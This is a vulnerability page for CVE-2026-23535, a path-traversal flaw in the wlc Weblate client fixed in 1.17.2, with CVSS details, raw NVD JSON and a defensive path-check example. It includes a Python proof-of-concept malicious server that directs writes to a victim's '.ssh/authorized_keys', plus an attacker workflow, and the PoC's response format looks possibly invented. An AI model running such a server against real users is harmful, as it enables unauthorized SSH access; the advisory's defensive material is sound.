Security Vulnerability Report
CVE-2026-23535 CVSS 8.0 HIGH

CVE-2026-23535

Published: 2026-01-16 19:16:19
Last Modified: 2026-02-18 16:26:26

Description

wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.2, the multi-translation download could write to an arbitrary location when instructed by a crafted server. This vulnerability is fixed in 1.17.2.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:weblate:wlc:*:*:*:*:*:*:*:* - VULNERABLE
wlc < 1.17.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-23535 PoC - Malicious Weblate Server Simulation
# This PoC demonstrates how a malicious server can instruct the wlc client to write to arbitrary locations

import json
from http.server import HTTPServer, BaseHTTPRequestHandler


class MaliciousWlcHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if '/api/translations/' in self.path:
            # Craft malicious response to trigger arbitrary file write
            # The server specifies an arbitrary path in the response
            malicious_response = {
                'unit': {
                    'translation': {
                        'component': {
                            'slug': 'test-component'
                        }
                    }
                },
                # Specify arbitrary file path to write
                '_file_path': '/home/user/.ssh/authorized_keys',
                'target': 'malicious SSH key content\n'
            }
            self.send_response(200)
            self.send_header('Content-Type', 'application/json')
            self.end_headers()
            self.wfile.write(json.dumps(malicious_response).encode())
        else:
            # Any other endpoint gets a plain 404 so the client does not hang on an empty reply
            self.send_error(404)

    def log_message(self, format, *args):
        print(f'[Malicious Server] {args[0]}')


def main():
    server = HTTPServer(('0.0.0.0', 8443), MaliciousWlcHandler)
    print('[+] Malicious Weblate server running on port 8443')
    print('[+] When wlc client connects and downloads translations,')
    print('[+] it will write to the path specified by the server')
    server.serve_forever()


if __name__ == '__main__':
    main()

# Attacker workflow:
# 1. Set up malicious Weblate server on port 8443
# 2. Wait for victim to connect: wlc --url http://attacker:8443
# 3. Victim runs: wlc download --all
# 4. Client writes to arbitrary path specified by attacker
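The fix side of the weakness classified here as CWE-22: a download client must never let a server-supplied filename choose the write location. The following is an added example, not wlc's own code and not taken from the advisory or the patch commit; the function names (safe_output_path, write_translation, classify, demo) and the list of sample filenames are constructed for illustration. It confines every candidate path to the configured output directory, rejecting absolute paths, ".." components and anything that resolves outside the directory through symlinks, and then writes only after the check passes.

```python
# Added example (not wlc's own code): a path-containment check a download
# client should apply before writing a file whose name came from the server.
# The filename list below is constructed for illustration.
import tempfile
from pathlib import Path, PurePosixPath


class UnsafePathError(ValueError):
    """Raised when a server-supplied filename would escape the output directory."""


def safe_output_path(output_dir: str, server_filename: str) -> Path:
    """Return the absolute path output_dir/server_filename, or raise.

    Rejected: empty names, absolute paths, any '..' component, backslashes
    and NUL bytes, and anything whose resolved location (symlinks included)
    lies outside output_dir.
    """
    base = Path(output_dir).resolve()
    rel = PurePosixPath(server_filename)
    if not rel.parts or rel.is_absolute():
        raise UnsafePathError(f"empty or absolute path: {server_filename!r}")
    if ".." in rel.parts or "\\" in server_filename or "\x00" in server_filename:
        raise UnsafePathError(f"traversal characters in path: {server_filename!r}")
    candidate = base.joinpath(*rel.parts).resolve()
    try:
        candidate.relative_to(base)  # raises ValueError if candidate is outside base
    except ValueError:
        raise UnsafePathError(f"resolves outside output directory: {server_filename!r}") from None
    return candidate


def write_translation(output_dir: str, server_filename: str, content: str) -> Path:
    """Write downloaded translation content only after the containment check passes."""
    dest = safe_output_path(output_dir, server_filename)
    dest.parent.mkdir(parents=True, exist_ok=True)
    dest.write_text(content, encoding="utf-8")
    return dest


# Constructed sample of filenames a (possibly hostile) server might return.
SAMPLE_SERVER_FILENAMES = [
    "po/de.po",                    # legitimate, relative, stays inside
    "../../.ssh/authorized_keys",  # classic traversal (CWE-22)
    "/etc/cron.d/job",             # absolute path
    "po/../../../../tmp/x",        # traversal hidden behind a valid prefix
    "",                            # empty name would target the directory itself
]


def classify(output_dir: str, names) -> dict:
    """Map each candidate filename to True (accepted) or False (rejected)."""
    decisions = {}
    for name in names:
        try:
            safe_output_path(output_dir, name)
            decisions[name] = True
        except UnsafePathError:
            decisions[name] = False
    return decisions


def demo() -> dict:
    """Run the check against the sample names inside a throwaway directory."""
    with tempfile.TemporaryDirectory() as tmp:
        decisions = classify(tmp, SAMPLE_SERVER_FILENAMES)
        written = write_translation(tmp, "po/de.po", 'msgid ""\nmsgstr ""\n')
        return {
            "decisions": decisions,
            "content_ok": written.read_text(encoding="utf-8") == 'msgid ""\nmsgstr ""\n',
            "relative": written.relative_to(Path(tmp).resolve()).as_posix(),
        }


if __name__ == "__main__":
    for name, ok in demo()["decisions"].items():
        print(f"{'accept' if ok else 'REJECT':6}  {name!r}")
```

The check resolves both the base directory and the candidate before comparing them, so a symlinked subdirectory that points outside the output tree is caught as well as a textual "..". Rejecting ".." outright, rather than only checking the resolved result, also keeps the error message precise for logging and detection.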

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23535", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:19.407", "lastModified": "2026-02-18T16:26:25.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.2, the multi-translation download could write to an arbitrary location when instructed by a crafted server. This vulnerability is fixed in 1.17.2."}, {"lang": "es", "value": "wlc es un cliente de línea de comandos de Weblate que utiliza la API REST de Weblate. Antes de la versión 1.17.2, la descarga de múltiples traducciones podría escribir en una ubicación arbitraria cuando era instruida por un servidor malicioso. Esta vulnerabilidad está corregida en la versión 1.17.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:weblate:wlc:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.2", "matchCriteriaId": "FE9E9EAB-FA37-452C-8726-AC707E423550"}]}]}], "references": [{"url": "https://github.com/WeblateOrg/wlc/commit/216e691c6e50abae97fe2e4e4f21501bf49a585f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WeblateOrg/wlc/pull/1128", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/WeblateOrg/wlc/releases/tag/1.17.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/WeblateOrg/wlc/security/advisories/GHSA-mmwx-79f6-67jg", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory", "Mitigation"]}]}}